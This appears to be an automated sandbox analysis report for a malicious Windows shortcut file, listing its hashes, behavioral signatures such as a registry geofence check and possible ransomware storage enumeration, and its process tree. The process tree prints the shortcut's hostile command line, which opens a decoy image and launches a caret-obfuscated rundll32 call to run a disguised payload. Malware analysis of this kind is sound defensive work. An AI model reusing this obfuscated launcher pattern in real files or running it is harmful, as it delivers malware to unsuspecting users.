Analysis
-
max time kernel
90s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 19:37
Static task
static1
Behavioral task
behavioral1
Sample
scan-51ea58dd-5b6a-4f56-9717-b102df29341d.lnk
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
scan-51ea58dd-5b6a-4f56-9717-b102df29341d.lnk
Resource
win10v2004-20220901-en
General
-
Target
scan-51ea58dd-5b6a-4f56-9717-b102df29341d.lnk
-
Size
1KB
-
MD5
87e7e9a47ce80f3e08c9f68b903a92fa
-
SHA1
b529db83c6c9ed87874139b2c26dd98010a08716
-
SHA256
327ca4b52987166a7c70153317423d47ea8682f7a1930ee5c9d85a5085070a7a
-
SHA512
407aacaca065d82091bceeae8388bc6043f16eda7c19286312615caedcf3db10cc3a831ac324c6592b4c31d4b5d9fd50d60f385ed4da5de4debc84b81c683222
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
cmd.exedescription pid process target process PID 1180 wrote to memory of 4324 1180 cmd.exe cmd.exe PID 1180 wrote to memory of 4324 1180 cmd.exe cmd.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\scan-51ea58dd-5b6a-4f56-9717-b102df29341d.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start f9382d62-4430-4827-8142-a001624533d3.png && start ru^n^d^l^l3^2 726b3c59-d5fb-430f-9190-c7e885ac91f3.neU,PluginInit2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4324-132-0x0000000000000000-mapping.dmp